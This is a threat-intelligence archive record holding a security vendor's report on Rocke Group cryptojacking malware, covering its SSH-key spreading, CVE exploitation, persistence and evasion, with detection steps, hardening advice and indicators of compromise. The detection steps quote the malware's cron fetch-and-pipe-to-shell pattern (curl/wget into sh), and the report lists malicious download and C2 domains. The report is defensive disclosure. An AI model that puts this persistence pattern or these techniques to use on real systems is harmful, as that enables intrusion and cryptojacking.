{
	"id": "9c7be8e2-7dc9-4a76-a2cb-7f69b1d560cd",
	"created_at": "2026-04-06T00:13:33.220949Z",
	"updated_at": "2026-04-10T03:34:57.692731Z",
	"deleted_at": null,
	"sha1_hash": "9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9",
	"title": "Rocke Group Actively Targeting the Cloud: Wants Your SSH Keys",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63688,
	"plain_text": "Rocke Group Actively Targeting the Cloud: Wants Your SSH Keys\r\nBy Nicole Fishbein\r\nPublished: 2021-04-06 · Archived: 2026-04-05 19:50:30 UTC\r\nNew Malware Variant Exploits Production Environment\r\nRocke Group is a Chinese-based threat actor most known for running cryptojacking malware on Linux machines.\r\nThe group has been active since 2018 and continues to evolve by modifying its tools and techniques to stay\r\nevasive. In 2019, we reported that Rocke Group was competing with Pacha Group for cryptomining positioning\r\non Linux-based servers in the cloud.\r\nWe have found a new malware variant developed by Rocke Group that infects other machines in the network\r\nusing saved SSH keys and weak passwords. It also exploits vulnerabilities in popular platforms and services such\r\nas Jenkins, Redis and ActiveMQ. Once the victim is infected, a Monero cryptominer is executed. Below we\r\npresent our findings with instructions on how to check if your system has been compromised, as well as how to\r\nprotect your cloud environments against future Rocke Group attacks.\r\nCapabilities and Findings on Rocke Group Malware\r\nThe malware that is initially delivered to the victim’s server is packed with a modified UPX which can make it\r\nharder for some Endpoint Detection and Response (EDR) products to detect the malicious code. This threat\r\ncontains a number of modules that are stored in a compressed form inside the malware, and during the execution\r\nthe payloads are extracted and executed.\r\nRocke Group uses a new script that downloads malware from a hosting server and executes it. The malware then\r\nuses public SSH keys, which are saved in a file called “known_hosts” on the victim’s Linux machine, to infect\r\nother machines on the network.\r\nThe malware achieves persistence using a scheduled task in crontab and bashrc files. It creates a service that\r\ncontrols the execution of the malware and configures it to be executed on startup. 
The payload of the service is\r\nextracted from within the Rocke Group sample.\r\nNext, the malware attempts to spread in the network by brute forcing SSH, Redis and Jenkins with weak\r\npasswords. Then, it exploits vulnerabilities. For Jenkins it uses two code-execution vulnerabilities (CVE-2018-1000861, CVE-2019-1003000), and for ActiveMQ it attempts an arbitrary file write (CVE-2016-3088).\r\nTo hide the activity of the malware, it implements an evasion technique that uses library hijacking. This way the\r\ninformation retrieved by system commands is altered in a way that hides resources used by the malware and its\r\ncomponents. For instance, running the ‘top’ command will not show the high CPU usage caused by the\r\ncryptomining malware.\r\nhttps://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/\r\nPage 1 of 4\n\nOne of the compressed modules is an XMRig Miner. Before the miner is executed, the dropper kills any other\r\nprocess that uses more than 30% of the cloud server’s CPU, so that the cryptominer has all of the CPU for\r\nitself.\r\nDetection and Response\r\nDetect if a machine in your system has been compromised by following all of these steps:\r\n1. The malware creates files in the following directories:\r\n/usr/local/sbin\r\n/usr/local/bin\r\n/usr/bin\r\n/usr/libexec\r\n/tmp\r\nCheck if there are suspicious files in these locations. This campaign is known for using similar names to valid\r\nLinux services and file names such as “kerberods”, so pay attention to the files you see in these directories. In\r\nother cases, it uses file names like: 6ff4ba5d0de4498. In addition, the malware changes the timestamps of files\r\ncreated during the attack so that they appear older. You should not rely on the creation/modification time of the\r\nfiles.\r\nResponse: Remove the malicious files.\r\nMITRE Technique: Masquerading (T1036)\r\n2. 
Check if there is a service that listens on port 61131 for incoming connections. Use the command:\r\nnetstat -tupln\r\nResponse: Find the PID of the process and kill it. Run the following command to get the PID: netstat -ltnp | grep -w ':61131' and then: sudo kill -9 \u003cPID\u003e to kill the process.\r\n3. Check if you have a service called sshservice.service. You can do this by running: systemctl status sshservice.service\r\nResponse: Stop and remove the service by running these commands:\r\nsystemctl stop [servicename]\r\nsystemctl disable [servicename]\r\nrm /etc/systemd/system/[servicename]\r\nrm /etc/systemd/system/[servicename]\r\nrm /usr/lib/systemd/system/[servicename]\r\nrm /usr/lib/systemd/system/[servicename]\r\nsystemctl daemon-reload\r\nsystemctl reset-failed\r\nMITRE Technique: Create System Process (T1543) and Masquerading (T1036)\r\n4. Check if the cron jobs include commands in the following format: */15 * * * * (curl -fsSL -m180 ||wget -q -T180 -O- )|sh\r\nCheck the following locations of scheduled jobs:\r\n/var/spool/cron/root\r\n/var/spool/cron/crontabs/root\r\n/etc/cron.d/root\r\nResponse: Delete these commands from the crontab.\r\nMITRE Technique: Scheduled Task/Job (T1053)\r\n5. Check whether /etc/bashrc contains commands in the same format as the crontab files.\r\nResponse: Delete the commands from the file.\r\nMITRE Technique: Event Triggered Execution using .bashrc file (T1546)\r\n6. This campaign uses DNS over HTTPS (DoH) to obtain the address of the C2 server using hard-coded domains that send back an encrypted DNS record. Inspect your network traffic for anomalies\r\nin HTTPS packets. Check if your machine tried to access one (or more) of the following domains:\r\nUpdate.iap5u1rbety6vifaxsi9vovnc9jjay2l[.]com\r\ncloudflare-dns[.]com\r\nMITRE Technique: Protocol Tunneling (T1572) and Encrypted Channel (T1573)\r\n7. 
The malware tries to infect other machines in the network by brute forcing weak passwords and\r\nexploiting vulnerabilities in Jenkins, Redis, SSH and ActiveMQ. Follow all of the steps above for\r\nmachines that have these services.\r\nMITRE Technique: Network Service Scanning (T1046)\r\nBe Proactive\r\nUse strong passwords for SSH, Jenkins and Redis services. It is also highly recommended to use TLS\r\nauthentication.\r\nUse different passwords and authentication keys for each machine in the network.\r\nMake sure that your Jenkins and ActiveMQ services have the latest updates.\r\nRestrict access to services and machines, and give only the required permissions for each user.\r\nFilter network traffic to untrusted or known bad domains.\r\nApply network anomaly detection to spot suspicious communication that deviates from the\r\nusual traffic.\r\nRuntime Protection is a Must\r\nThis attack is sophisticated in that it implements evasion techniques, making detection much harder. It also spreads\r\nto other services and machines on the network, making it harder to respond to. Runtime protection gives you\r\nimmediate visibility over all code running in your systems and alerts you whenever unauthorized code is executed.\r\nSo, if Rocke Group attacks an environment with runtime protection, the user would immediately get an alert on all\r\ninfected machines with the ability to terminate the malicious processes. While there are dozens of cloud attack\r\nvectors that threat actors can utilize, such as software vulnerabilities and misconfigurations, eventually all\r\nattackers must run code or commands in the production environment to cause any damage. Consider that it’s not\r\nrealistic to be able to close all attack vectors. 
Not only does it take time to fix vulnerabilities, but there are always\r\nattack vectors that are practically impossible to prevent such as supply chain or unknown vulnerabilities. Recent\r\nattacks have shown that Linux cryptominers and other threats will find their way into the production environment\r\nno matter how hard you work to reduce the attack surface. Runtime protection is a necessary last line of defense as\r\nactors like Rocke Group remain active.\r\nIoCs\r\nDropper Script\r\nF947e69f9f8d113fb9fba3e795827110ee17feb310b54a7f7b6672a5386a3de2\r\nMalware\r\nFe27d4a8a5f299b0b25d10816e98cef2852af6dc3541bf25a77960b1573ca61d\r\nMining Pool\r\nminexmr[.]com pool\r\nXMRig Miner\r\n398e3608455dbea2cba8e9944d9b43cbb0982b48b2882fe54adf937a7a62d9e2\r\nDomains Used to Download the Malware\r\nimg[.]sobot.com\r\ncdn[.]xiaoduoai.com\r\nhttps://user-images[.]githubusercontent.com\r\nDomains Used for Resolving the C2 Address\r\nUpdate.iap5u1rbety6vifaxsi9vovnc9jjay2l[.]com\r\ncloudflare-dns[.]com\r\nThanks to Joakim Kennedy for contributing to this post.\r\nSource: https://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/"
	],
	"report_names": [
		"rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys"
	],
	"threat_actors": [
		{
			"id": "7c053836-8f50-4d40-bc5c-7088967e1b57",
			"created_at": "2022-10-25T16:07:24.549525Z",
			"updated_at": "2026-04-10T02:00:05.03048Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra",
				"G0106",
				"Iron Group",
				"Rocke"
			],
			"source_name": "ETDA:Rocke",
			"tools": [
				"Godlua",
				"Kerberods",
				"LSD",
				"Pro-Ocean",
				"Xbash"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18bcbaa6-8e7b-43c4-9db7-8b0b315ee5a3",
			"created_at": "2023-01-06T13:46:39.024086Z",
			"updated_at": "2026-04-10T02:00:03.184974Z",
			"deleted_at": null,
			"main_name": "Pacha Group",
			"aliases": [],
			"source_name": "MISPGALAXY:Pacha Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "905eabd9-2b7f-483d-86bd-0c72f96b4162",
			"created_at": "2023-01-06T13:46:39.02749Z",
			"updated_at": "2026-04-10T02:00:03.185957Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Aged Libra"
			],
			"source_name": "MISPGALAXY:Rocke",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f",
			"created_at": "2022-10-25T15:50:23.360509Z",
			"updated_at": "2026-04-10T02:00:05.337702Z",
			"deleted_at": null,
			"main_name": "Rocke",
			"aliases": [
				"Rocke"
			],
			"source_name": "MITRE:Rocke",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "484c5fed-029e-4504-b75a-bbdbc9460595",
			"created_at": "2022-10-25T16:07:24.529893Z",
			"updated_at": "2026-04-10T02:00:05.02425Z",
			"deleted_at": null,
			"main_name": "Pacha Group",
			"aliases": [],
			"source_name": "ETDA:Pacha Group",
			"tools": [
				"Antd",
				"DDG",
				"GreedyAntd",
				"Korkerds",
				"XMRig"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434413,
	"ts_updated_at": 1775792097,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9.pdf",
		"text": "https://archive.orkl.eu/9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9.txt",
		"img": "https://archive.orkl.eu/9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9.jpg"
	}
}